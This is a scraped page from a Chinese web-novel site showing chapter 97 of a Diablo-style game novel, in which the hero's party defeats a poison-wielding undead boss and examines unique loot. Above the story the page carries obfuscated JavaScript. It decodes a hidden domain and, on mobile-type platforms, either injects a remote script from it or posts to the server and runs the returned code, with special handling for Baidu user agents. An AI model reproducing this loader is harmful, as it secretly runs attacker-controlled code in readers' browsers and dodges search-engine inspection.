98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

第97章 任务(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

两个女孩对于莫北的间歇性神经病,已经见怪不怪了。

而骨灰虽然丧失了语言能力,却曾是试图阻止安达利尔进入大教堂的最后一位人类。

对于主教们的集体堕落与叛变,他依旧坚定自己的信仰,打算借助这座圣殿内的圣光之力对抗安达利尔的入侵。

然而他却没有得到任何回应,只能抱着圣契,像个傻逼一样站在安达利尔的面前,看着对方脸上的嘲弄。

他的灵魂被自己的信仰击碎了,身体的血肉在痛苦女王的注视下,迅速地溶解销蚀。

安达利尔没有一脚将他的残骸踏碎,任由他泡在一滩剧毒的腐液之中。而后释放无尽的地狱魔气,将这个教廷的圣殿笼罩在腐化与黑暗之中。

他的骸骨在疯狂吸纳了这片空间之中的剧毒和阴冷之后,便以如今这幅形象重生了。

如今他的意识之中,只剩下黑暗与憎恨。那个人类胡言乱语的挑衅,让他产生一股欲要腐蚀一切的愤怒情绪。

布道台之上狂烈的毒气鼓荡不息,在骨灰那空洞的骨骼缝隙间极快地翻涌,像是在剧烈喘息一般,竟发出一阵阵尖锐的嘶鸣声。

而后那具碧绿的骸骨居然在汹涌的毒气裹挟之下,腾空而起,却并没有维持多久,便朝着三人前方的地面上落下。

随着骨灰的靠近,三人周身的毒气彻底暴走,疯狂搅动,整个大教堂之中卷起一道以骨灰为中心的剧毒风暴。

三人之中毒抗最低的米洛尔,都有着40%的毒抗,此时在这毒素风暴之中,几乎没有感到任何不适。

莫北踩着八级的净化光环,看着自己纹丝不动的生命值,甚至有些心疼对方做出的努力。

作为镇守在安达利尔巢穴前的最后一只首领级怪物,骨灰对于毒抗不足的队伍来说,就是噩梦一般的存在。

虽然将许多队伍拦在大教堂之外,却也被转职者们当做一块挑战安达利尔的试金石。

莫北从很早之前就一直留心各种带毒抗的装备,更是运气爆棚地收获了死亡之手和加17全抗的盾牌。还费了好一番口舌,从一个德鲁伊身上换来一条毒抗暗金腰带。

而佩罗娜就更欧皇了,这次出来之前,恰西就刚刚好为她的面具注入了32%的毒抗。

所以这个偏科很严重的骨灰同学就悲剧了。

唯一让三人觉得有些麻烦的,就是骨灰身上带有的魔法抵抗,使得对付不死生物最好用的圣光弹和火焰法术,落在它身上效果都大打折扣。

饶是如此,莫北也只是觉得他们在殴打一台大功率的电风扇。

骨灰在遭受了一通残忍的虐待之后,临死爆开一个威力强大的霜之新星,连一地碎骨都像干冰一般迅速挥发成一屡屡的毒雾。

莫北从地上抓起一条翠绿色的饰带,然后就乐了。

暗金!可是有段日子没见着了!

麻溜地辨识了,还得抓紧去追那几个杂碎呢。

雷尼摩

饰带

防御力:2

耐久度:12之12

需要等级:7

+15法力

+30%法力恢复速度

所有抗性+5

+1照亮范围

手里抖落着这条绿油油的腰带,幸灾乐祸地递给了佩罗娜,终于有人跟自己一起丑了嘿!

然后他就看着佩罗娜将腰带系在腰侧,垂下一长一短两条丝带,俏皮中居然还带着一丝仙气儿。

莫北愣了,这难道就是时尚界说的,没有丑衣服,只是你不会穿?

他有样学样地将自己的红腰带往一侧拽了拽。

这特么。。。。

妥妥的还是陕北秧歌队。。。

这么接地气吗。。

另一件装备是一个精致的头环。莫北对于这件装备的属性相当期待,在他印象之中,这样的头环很经常出现提升技能等级的属性。

精灵之额头

头饰

防御力:49

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间